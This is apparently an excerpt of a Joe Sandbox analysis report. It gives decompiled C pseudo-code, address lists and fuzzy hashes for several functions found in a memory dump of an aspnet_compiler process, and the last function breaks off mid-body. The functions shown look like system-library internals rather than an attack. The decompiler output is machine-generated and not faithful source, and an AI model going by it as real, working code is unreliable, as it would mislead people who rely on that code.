                          				_t179 = __ecx;
                          				_v48 = __edx;
                          				_v68 = 0;
                          				_v72 = 0;
                          				_push(__ecx[1]);
                          				_push( *__ecx);
                          				_push(0);
                          				_t153 = 0x14;
                          				_t135 = _t153;
                          				_t132 = E014BBBBB(_t135, _t153);
                          				if(_t132 == 0) {
                          					_t166 = _v68;
                          					goto L43;
                          				} else {
                          					_t155 = 0;
                          					_v52 = 0;
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					_v56 = __ecx[1];
                          					if( *__ecx >> 8 < 2) {
                          						_t155 = 1;
                          						_v52 = 1;
                          					}
                          					_t139 = _a4;
                          					_t87 = (_t155 << 0xc) + _t139;
                          					_v60 = _t87;
                          					if(_t87 < _t139) {
                          						L11:
                          						_t166 = _v68;
                          						L12:
                          						if(_t132 != 0) {
                          							E014BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                          						}
                          						L43:
                          						if(_v72 != 0) {
                          							_push( *((intOrPtr*)(_t179 + 4)));
                          							_push( *_t179);
                          							_push(0x8000);
                          							E014BAFDE( &_v72,  &_v60);
                          						}
                          						L46:
                          						return _t166;
                          					}
                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                          					asm("sbb edi, edi");
                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                          					if(_t90 != 0) {
                          						_push(0);
                          						_push(0x14);
                          						_push( &_v44);
                          						_push(3);
                          						_push(_t179);
                          						_push(0xffffffff);
                          						if(E01439730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                          							_push(_t139);
                          							E014BA80D(_t179, 1, _v40, 0);
                          							_t172 = 4;
                          						}
                          					}
                          					_t141 =  &_v72;
                          					if(E014BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                          						_v64 = _a4;
                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                          						asm("sbb edi, edi");
                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                          						if(_t94 != 0) {
                          							_push(0);
                          							_push(0x14);
                          							_push( &_v24);
                          							_push(3);
                          							_push(_t179);
                          							_push(0xffffffff);
                          							if(E01439730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                          								_push(_t141);
                          								E014BA80D(_t179, 1, _v20, 0);
                          								_t176 = 4;
                          							}
                          						}
                          						if(E014BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                          							goto L11;
                          						} else {
                          							_t177 = _v64;
                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                          							_t100 = _v52 + _v52;
                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                          							 *(_t132 + 0x10) = _t146;
                          							asm("bsf eax, [esp+0x18]");
                          							_v52 = _t100;
                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                          							_t47 =  &_a8;
                          							 *_t47 = _a8 & 0x00000001;
                          							if( *_t47 == 0) {
                          								E01412280(_t179 + 0x30, _t179 + 0x30);
                          							}
                          							_t147 =  *(_t179 + 0x34);
                          							_t159 =  *(_t179 + 0x38) & 1;
                          							_v68 = 0;
                          							if(_t147 == 0) {
                          								L35:
                          								E0140B090(_t179 + 0x34, _t147, _v68, _t132);
                          								if(_a8 == 0) {
                          									E0140FFB0(_t132, _t177, _t179 + 0x30);
                          								}
                          								asm("lock xadd [eax], ecx");
                          								asm("lock xadd [eax], edx");
                          								_t132 = 0;
                          								_v72 = _v72 & 0;
                          								_v68 = _v72;
                          								if(E01417D50() == 0) {
                          									_t113 = 0x7ffe0388;
                          								} else {
                          									_t177 = _v64;
                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          								}
                          								if( *_t113 == _t132) {
                          									_t166 = _v68;
                          									goto L46;
                          								} else {
                          									_t166 = _v68;
                          									E014AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                          									goto L12;
                          								}
                          							} else {
                          								L23:
                          								while(1) {
                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                          										_t122 =  *_t147;
                          										if(_t159 == 0) {
                          											L32:
                          											if(_t122 == 0) {
                          												L34:
                          												_v68 = 0;
                          												goto L35;
                          											}
                          											L33:
                          											_t147 = _t122;
                          											continue;
                          										}
                          										if(_t122 == 0) {
                          											goto L34;
                          										}
                          										_t122 = _t122 ^ _t147;
                          										goto L32;
                          									}
                          									_t122 =  *(_t147 + 4);
                          									if(_t159 == 0) {
                          										L27:
                          										if(_t122 != 0) {
                          											goto L33;
                          										}
                          										L28:
                          										_v68 = 1;
                          										goto L35;
                          									}
                          									if(_t122 == 0) {
                          										goto L28;
                          									}
                          									_t122 = _t122 ^ _t147;
                          									goto L27;
                          								}
                          							}
                          						}
                          					}
                          					_v72 = _v72 & 0x00000000;
                          					goto L11;
                          				}
                          			}




































                          0x014be547
                          0x014be549
                          0x014be54f
                          0x014be553
                          0x014be557
                          0x014be55a
                          0x014be55c
                          0x014be55f
                          0x014be561
                          0x014be567
                          0x014be56b
                          0x014be7e2
                          0x00000000
                          0x014be571
                          0x014be575
                          0x014be577
                          0x014be57b
                          0x014be57c
                          0x014be57d
                          0x014be57e
                          0x014be57f
                          0x014be588
                          0x014be58f
                          0x014be591
                          0x014be592
                          0x014be592
                          0x014be596
                          0x014be59e
                          0x014be5a0
                          0x014be5a6
                          0x014be61d
                          0x014be61d
                          0x014be621
                          0x014be623
                          0x014be630
                          0x014be630
                          0x014be7e6
                          0x014be7eb
                          0x014be7ed
                          0x014be7f4
                          0x014be7fa
                          0x014be7ff
                          0x014be7ff
                          0x014be80a
                          0x014be812
                          0x014be812
                          0x014be5ab
                          0x014be5b4
                          0x014be5b9
                          0x014be5be
                          0x014be5c0
                          0x014be5c2
                          0x014be5c8
                          0x014be5c9
                          0x014be5cb
                          0x014be5cc
                          0x014be5d5
                          0x014be5e4
                          0x014be5f1
                          0x014be5f8
                          0x014be5f8
                          0x014be5d5
                          0x014be602
                          0x014be616
                          0x014be63d
                          0x014be644
                          0x014be64d
                          0x014be652
                          0x014be657
                          0x014be659
                          0x014be65b
                          0x014be661
                          0x014be662
                          0x014be664
                          0x014be665
                          0x014be66e
                          0x014be67d
                          0x014be68a
                          0x014be691
                          0x014be691
                          0x014be66e
                          0x014be6b0
                          0x00000000
                          0x014be6b6
                          0x014be6bd
                          0x014be6c7
                          0x014be6d7
                          0x014be6d9
                          0x014be6db
                          0x014be6de
                          0x014be6e3
                          0x014be6f3
                          0x014be6fc
                          0x014be700
                          0x014be700
                          0x014be704
                          0x014be70a
                          0x014be70a
                          0x014be713
                          0x014be716
                          0x014be719
                          0x014be720
                          0x014be761
                          0x014be76b
                          0x014be774
                          0x014be77a
                          0x014be77a
                          0x014be78a
                          0x014be791
                          0x014be799
                          0x014be79b
                          0x014be79f
                          0x014be7aa
                          0x014be7c0
                          0x014be7ac
                          0x014be7b2
                          0x014be7b9
                          0x014be7b9
                          0x014be7c7
                          0x014be806
                          0x00000000
                          0x014be7c9
                          0x014be7d1
                          0x014be7d8
                          0x00000000
                          0x014be7d8
                          0x00000000
                          0x00000000
                          0x014be722
                          0x014be72e
                          0x014be748
                          0x014be74c
                          0x014be754
                          0x014be756
                          0x014be75c
                          0x014be75c
                          0x00000000
                          0x014be75c
                          0x014be758
                          0x014be758
                          0x00000000
                          0x014be758
                          0x014be750
                          0x00000000
                          0x00000000
                          0x014be752
                          0x00000000
                          0x014be752
                          0x014be730
                          0x014be735
                          0x014be73d
                          0x014be73f
                          0x00000000
                          0x00000000
                          0x014be741
                          0x014be741
                          0x00000000
                          0x014be741
                          0x014be739
                          0x00000000
                          0x00000000
                          0x014be73b
                          0x00000000
                          0x014be73b
                          0x014be722
                          0x014be720
                          0x014be6b0
                          0x014be618
                          0x00000000
                          0x014be618

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction ID: 33813df4470f1249488385b32e2c2ee2d3c125c78574ac26031d53d8d337e0c6
                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction Fuzzy Hash: CB91A3312043429FE724CE29C981B9BBBE5EFD4714F14892EF699D72A0E774E904CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E014751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed short* _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				signed int _t67;
                          				intOrPtr _t74;
                          				intOrPtr _t84;
                          				intOrPtr _t88;
                          				intOrPtr _t94;
                          				void* _t100;
                          				void* _t103;
                          				intOrPtr _t105;
                          				signed int _t106;
                          				short* _t108;
                          				signed int _t110;
                          				signed int _t113;
                          				signed int* _t115;
                          				signed short* _t117;
                          				void* _t118;
                          				void* _t119;
                          
                          				_push(0x80);
                          				_push(0x14d05f0);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                          				_t115 =  *(_t118 + 0xc);
                          				 *(_t118 - 0x7c) = _t115;
                          				 *((char*)(_t118 - 0x65)) = 0;
                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                          				_t113 = 0;
                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                          				_t100 = __ecx;
                          				if(_t100 == 0) {
                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                          					E0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          					 *((char*)(_t118 - 0x65)) = 1;
                          					_t63 =  *(_t118 - 0x90);
                          					_t101 = _t63[2];
                          					_t64 =  *_t63 & 0x0000ffff;
                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                          					L20:
                          					_t65 = _t64 >> 1;
                          					L21:
                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                          					if(_t108 == 0) {
                          						L27:
                          						 *_t115 = _t65 + 1;
                          						_t67 = 0xc0000023;
                          						L28:
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                          						L29:
                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                          						E014753CA(0);
                          						return E0144D130(0, _t113, _t115);
                          					}
                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                          							 *_t108 = 0;
                          						}
                          						goto L27;
                          					}
                          					 *_t115 = _t65;
                          					_t115 = _t65 + _t65;
                          					E0143F3E0(_t108, _t101, _t115);
                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                          					_t67 = 0;
                          					goto L28;
                          				}
                          				_t103 = _t100 - 1;
                          				if(_t103 == 0) {
                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                          					_t74 = E01413690(1, _t117, 0x13d1810, _t118 - 0x74);
                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                          					_t101 = _t117[2];
                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                          					if(_t74 < 0) {
                          						_t64 =  *_t117 & 0x0000ffff;
                          						_t115 =  *(_t118 - 0x7c);
                          						goto L20;
                          					}
                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                          					_t115 =  *(_t118 - 0x7c);
                          					goto L21;
                          				}
                          				if(_t103 == 1) {
                          					_t105 = 4;
                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                          					_push(_t118 - 0x70);
                          					_push(0);
                          					_push(0);
                          					_push(_t105);
                          					_push(_t118 - 0x78);
                          					_push(0x6b);
                          					 *((intOrPtr*)(_t118 - 0x64)) = E0143AA90();
                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                          					_t113 = L01414620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                          					if(_t113 != 0) {
                          						_push(_t118 - 0x70);
                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                          						_push(_t113);
                          						_push(4);
                          						_push(_t118 - 0x78);
                          						_push(0x6b);
                          						_t84 = E0143AA90();
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                          						if(_t84 < 0) {
                          							goto L29;
                          						}
                          						_t110 = 0;
                          						_t106 = 0;
                          						while(1) {
                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                          							 *(_t118 - 0x88) = _t106;
                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                          								break;
                          							}
                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                          							_t106 = _t106 + 1;
                          						}
                          						_t88 = E0147500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                          						_t119 = _t119 + 0x1c;
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                          						if(_t88 < 0) {
                          							goto L29;
                          						}
                          						_t101 = _t118 - 0x3c;
                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                          						goto L21;
                          					}
                          					_t67 = 0xc0000017;
                          					goto L28;
                          				}
                          				_push(0);
                          				_push(0x20);
                          				_push(_t118 - 0x60);
                          				_push(0x5a);
                          				_t94 = E01439860();
                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                          				if(_t94 < 0) {
                          					goto L29;
                          				}
                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                          					_t101 = L"Legacy";
                          					_push(6);
                          				} else {
                          					_t101 = L"UEFI";
                          					_push(4);
                          				}
                          				_pop(_t65);
                          				goto L21;
                          			}






















                          0x014751be
                          0x014751c3
                          0x014751c8
                          0x014751cd
                          0x014751d0
                          0x014751d3
                          0x014751d8
                          0x014751db
                          0x014751de
                          0x014751e0
                          0x014751e3
                          0x014751e6
                          0x014751e8
                          0x01475342
                          0x01475351
                          0x01475356
                          0x0147535a
                          0x01475360
                          0x01475363
                          0x01475366
                          0x01475369
                          0x01475369
                          0x0147536b
                          0x0147536b
                          0x01475370
                          0x014753a3
                          0x014753a4
                          0x014753a6
                          0x014753ab
                          0x014753ab
                          0x014753ae
                          0x014753ae
                          0x014753b5
                          0x014753bf
                          0x014753bf
                          0x01475375
                          0x01475396
                          0x014753a0
                          0x014753a0
                          0x00000000
                          0x01475396
                          0x01475377
                          0x01475379
                          0x0147537f
                          0x0147538c
                          0x01475390
                          0x00000000
                          0x01475390
                          0x014751ee
                          0x014751f1
                          0x01475301
                          0x01475310
                          0x01475315
                          0x01475318
                          0x0147531b
                          0x01475320
                          0x0147532e
                          0x01475331
                          0x00000000
                          0x01475331
                          0x01475328
                          0x01475329
                          0x00000000
                          0x01475329
                          0x014751fa
                          0x01475235
                          0x01475236
                          0x01475239
                          0x0147523f
                          0x01475240
                          0x01475241
                          0x01475242
                          0x01475246
                          0x01475247
                          0x0147524e
                          0x01475251
                          0x01475267
                          0x01475269
                          0x0147526e
                          0x0147527d
                          0x0147527e
                          0x01475281
                          0x01475282
                          0x01475287
                          0x01475288
                          0x0147528a
                          0x0147528f
                          0x01475294
                          0x00000000
                          0x00000000
                          0x0147529a
                          0x0147529c
                          0x0147529e
                          0x0147529e
                          0x014752a4
                          0x014752b0
                          0x00000000
                          0x00000000
                          0x014752ba
                          0x014752bc
                          0x014752bc
                          0x014752d4
                          0x014752d9
                          0x014752dc
                          0x014752e1
                          0x00000000
                          0x00000000
                          0x014752e7
                          0x014752f4
                          0x00000000
                          0x014752f4
                          0x01475270
                          0x00000000
                          0x01475270
                          0x014751fc
                          0x014751fd
                          0x01475202
                          0x01475203
                          0x01475205
                          0x0147520a
                          0x0147520f
                          0x00000000
                          0x00000000
                          0x0147521b
                          0x01475226
                          0x0147522b
                          0x0147521d
                          0x0147521d
                          0x01475222
                          0x01475222
                          0x0147522d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                          • Instruction ID: 720fa8eb764d2b89205582ddb77f01727253b34245818f627521c9f7adec2d2d
                          • Opcode Fuzzy Hash: ca48fc466c006e09ed91316f3bde217026d084aa4c699b1dc2e72ddf09f90fef
                          • Instruction Fuzzy Hash: D9516EB1E006099FDB25DFA9C940AAEBBF8FF58704F14442EE649EF261DB719901CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E0141B944(signed int* __ecx, char __edx) {
                          				signed int _v8;
                          				signed int _v16;
                          				signed int _v20;
                          				char _v28;
                          				signed int _v32;
                          				char _v36;
                          				signed int _v40;
                          				intOrPtr _v44;
                          				signed int* _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				char _v77;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t65;
                          				intOrPtr _t67;
                          				intOrPtr _t68;
                          				char* _t73;
                          				intOrPtr _t77;
                          				intOrPtr _t78;
                          				signed int _t82;
                          				intOrPtr _t83;
                          				void* _t87;
                          				char _t88;
                          				intOrPtr* _t89;
                          				intOrPtr _t91;
                          				void* _t97;
                          				intOrPtr _t100;
                          				void* _t102;
                          				void* _t107;
                          				signed int _t108;
                          				intOrPtr* _t112;
                          				void* _t113;
                          				intOrPtr* _t114;
                          				intOrPtr _t115;
                          				intOrPtr _t116;
                          				intOrPtr _t117;
                          				signed int _t118;
                          				void* _t130;
                          
                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                          				_v8 =  *0x14ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                          				_t112 = __ecx;
                          				_v77 = __edx;
                          				_v48 = __ecx;
                          				_v28 = 0;
                          				_t5 = _t112 + 0xc; // 0x575651ff
                          				_t105 =  *_t5;
                          				_v20 = 0;
                          				_v16 = 0;
                          				if(_t105 == 0) {
                          					_t50 = _t112 + 4; // 0x5de58b5b
                          					_t60 =  *__ecx |  *_t50;
                          					if(( *__ecx |  *_t50) != 0) {
                          						 *__ecx = 0;
                          						__ecx[1] = 0;
                          						if(E01417D50() != 0) {
                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          						} else {
                          							_t65 = 0x7ffe0386;
                          						}
                          						if( *_t65 != 0) {
                          							E014C8CD6(_t112);
                          						}
                          						_push(0);
                          						_t52 = _t112 + 0x10; // 0x778df98b
                          						_push( *_t52);
                          						_t60 = E01439E20();
                          					}
                          					L20:
                          					_pop(_t107);
                          					_pop(_t113);
                          					_pop(_t87);
                          					return E0143B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                          				}
                          				_t8 = _t112 + 8; // 0x8b000cc2
                          				_t67 =  *_t8;
                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                          				_t108 =  *(_t67 + 0x14);
                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                          				_t105 = 0x2710;
                          				asm("sbb eax, edi");
                          				_v44 = _t88;
                          				_v52 = _t108;
                          				_t60 = E0143CE00(_t97, _t68, 0x2710, 0);
                          				_v56 = _t60;
                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                          					L3:
                          					 *(_t112 + 0x44) = _t60;
                          					_t105 = _t60 * 0x2710 >> 0x20;
                          					 *_t112 = _t88;
                          					 *(_t112 + 4) = _t108;
                          					_v20 = _t60 * 0x2710;
                          					_v16 = _t60 * 0x2710 >> 0x20;
                          					if(_v77 != 0) {
                          						L16:
                          						_v36 = _t88;
                          						_v32 = _t108;
                          						if(E01417D50() != 0) {
                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          						} else {
                          							_t73 = 0x7ffe0386;
                          						}
                          						if( *_t73 != 0) {
                          							_t105 = _v40;
                          							E014C8F6A(_t112, _v40, _t88, _t108);
                          						}
                          						_push( &_v28);
                          						_push(0);
                          						_push( &_v36);
                          						_t48 = _t112 + 0x10; // 0x778df98b
                          						_push( *_t48);
                          						_t60 = E0143AF60();
                          						goto L20;
                          					} else {
                          						_t89 = 0x7ffe03b0;
                          						do {
                          							_t114 = 0x7ffe0010;
                          							do {
                          								_t77 =  *0x14e8628; // 0x0
                          								_v68 = _t77;
                          								_t78 =  *0x14e862c; // 0x0
                          								_v64 = _t78;
                          								_v72 =  *_t89;
                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                          								while(1) {
                          									_t105 =  *0x7ffe000c;
                          									_t100 =  *0x7ffe0008;
                          									if(_t105 ==  *_t114) {
                          										goto L8;
                          									}
                          									asm("pause");
                          								}
                          								L8:
                          								_t89 = 0x7ffe03b0;
                          								_t115 =  *0x7ffe03b0;
                          								_t82 =  *0x7FFE03B4;
                          								_v60 = _t115;
                          								_t114 = 0x7ffe0010;
                          								_v56 = _t82;
                          							} while (_v72 != _t115 || _v76 != _t82);
                          							_t83 =  *0x14e8628; // 0x0
                          							_t116 =  *0x14e862c; // 0x0
                          							_v76 = _t116;
                          							_t117 = _v68;
                          						} while (_t117 != _t83 || _v64 != _v76);
                          						asm("sbb edx, [esp+0x24]");
                          						_t102 = _t100 - _v60 - _t117;
                          						_t112 = _v48;
                          						_t91 = _v44;
                          						asm("sbb edx, eax");
                          						_t130 = _t105 - _v52;
                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                          							_t88 = _t102 - _t91;
                          							asm("sbb edx, edi");
                          							_t108 = _t105;
                          						} else {
                          							_t88 = 0;
                          							_t108 = 0;
                          						}
                          						goto L16;
                          					}
                          				} else {
                          					if( *(_t112 + 0x44) == _t60) {
                          						goto L20;
                          					}
                          					goto L3;
                          				}
                          			}
















































                          0x0141b94c
                          0x0141b956
                          0x0141b95c
                          0x0141b95e
                          0x0141b964
                          0x0141b969
                          0x0141b96d
                          0x0141b96d
                          0x0141b970
                          0x0141b974
                          0x0141b97a
                          0x0141badf
                          0x0141badf
                          0x0141bae2
                          0x0141bae4
                          0x0141bae6
                          0x0141baf0
                          0x01462cb8
                          0x0141baf6
                          0x0141baf6
                          0x0141baf6
                          0x0141bafd
                          0x0141bb1f
                          0x0141bb1f
                          0x0141baff
                          0x0141bb00
                          0x0141bb00
                          0x0141bb03
                          0x0141bb03
                          0x0141bacb
                          0x0141bacf
                          0x0141bad0
                          0x0141bad1
                          0x0141badc
                          0x0141badc
                          0x0141b980
                          0x0141b980
                          0x0141b988
                          0x0141b98b
                          0x0141b98d
                          0x0141b990
                          0x0141b993
                          0x0141b999
                          0x0141b99b
                          0x0141b9a1
                          0x0141b9a5
                          0x0141b9aa
                          0x0141b9b0
                          0x0141b9bb
                          0x0141b9c0
                          0x0141b9c3
                          0x0141b9ca
                          0x0141b9cc
                          0x0141b9cf
                          0x0141b9d3
                          0x0141b9d7
                          0x0141ba94
                          0x0141ba94
                          0x0141ba98
                          0x0141baa3
                          0x01462ccb
                          0x0141baa9
                          0x0141baa9
                          0x0141baa9
                          0x0141bab1
                          0x01462cd5
                          0x01462cdd
                          0x01462cdd
                          0x0141babb
                          0x0141babc
                          0x0141bac2
                          0x0141bac3
                          0x0141bac3
                          0x0141bac6
                          0x00000000
                          0x0141b9dd
                          0x0141b9dd
                          0x0141b9e7
                          0x0141b9e7
                          0x0141b9ec
                          0x0141b9ec
                          0x0141b9f1
                          0x0141b9f5
                          0x0141b9fa
                          0x0141ba00
                          0x0141ba0c
                          0x0141ba10
                          0x0141ba10
                          0x0141ba12
                          0x0141ba18
                          0x00000000
                          0x00000000
                          0x0141bb26
                          0x0141bb26
                          0x0141ba1e
                          0x0141ba1e
                          0x0141ba23
                          0x0141ba25
                          0x0141ba2c
                          0x0141ba30
                          0x0141ba35
                          0x0141ba35
                          0x0141ba41
                          0x0141ba46
                          0x0141ba4c
                          0x0141ba50
                          0x0141ba54
                          0x0141ba6a
                          0x0141ba6e
                          0x0141ba70
                          0x0141ba74
                          0x0141ba78
                          0x0141ba7a
                          0x0141ba7c
                          0x0141ba8e
                          0x0141ba90
                          0x0141ba92
                          0x0141bb14
                          0x0141bb14
                          0x0141bb16
                          0x0141bb16
                          0x00000000
                          0x0141ba7c
                          0x0141bb0a
                          0x0141bb0d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141bb0f

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141B9A5
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 885266447-0
                          • Opcode ID: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                          • Instruction ID: 8d61aeced6279e58ca3e69d61fcda6ef66e515b50288726f50cbd964a33c5497
                          • Opcode Fuzzy Hash: 4130d9efb275e5b0f1e5b7c007ee4c0e3169df1a1b13f7e88cab1c183620d033
                          • Instruction Fuzzy Hash: 79515771A08341CFC721DF69C48092BBBF5FB88650F14896FEA8997769D770E841CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E013FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                          				signed int _t65;
                          				signed short _t69;
                          				intOrPtr _t70;
                          				signed short _t85;
                          				void* _t86;
                          				signed short _t89;
                          				signed short _t91;
                          				intOrPtr _t92;
                          				intOrPtr _t97;
                          				intOrPtr* _t98;
                          				signed short _t99;
                          				signed short _t101;
                          				void* _t102;
                          				char* _t103;
                          				signed short _t104;
                          				intOrPtr* _t110;
                          				void* _t111;
                          				void* _t114;
                          				intOrPtr* _t115;
                          
                          				_t109 = __esi;
                          				_t108 = __edi;
                          				_t106 = __edx;
                          				_t95 = __ebx;
                          				_push(0x90);
                          				_push(0x14cf7a8);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                          				if(__edx == 0xffffffff) {
                          					L6:
                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                          					__eflags = _t65 & 0x00000002;
                          					if((_t65 & 0x00000002) != 0) {
                          						L3:
                          						L4:
                          						return E0144D130(_t95, _t108, _t109);
                          					}
                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                          					_t108 = 0;
                          					_t109 = 0;
                          					_t95 = 0;
                          					__eflags = 0;
                          					while(1) {
                          						__eflags = _t95 - 0x200;
                          						if(_t95 >= 0x200) {
                          							break;
                          						}
                          						E0143D000(0x80);
                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                          						_t108 = _t115;
                          						_t95 = _t95 - 0xffffff80;
                          						_t17 = _t114 - 4;
                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                          						__eflags =  *_t17;
                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                          						_t102 = _t110 + 1;
                          						do {
                          							_t85 =  *_t110;
                          							_t110 = _t110 + 1;
                          							__eflags = _t85;
                          						} while (_t85 != 0);
                          						_t111 = _t110 - _t102;
                          						_t21 = _t95 - 1; // -129
                          						_t86 = _t21;
                          						__eflags = _t111 - _t86;
                          						if(_t111 > _t86) {
                          							_t111 = _t86;
                          						}
                          						E0143F3E0(_t108, _t106, _t111);
                          						_t115 = _t115 + 0xc;
                          						_t103 = _t111 + _t108;
                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                          						_t89 = _t95 - _t111;
                          						__eflags = _t89;
                          						_push(0);
                          						if(_t89 == 0) {
                          							L15:
                          							_t109 = 0xc000000d;
                          							goto L16;
                          						} else {
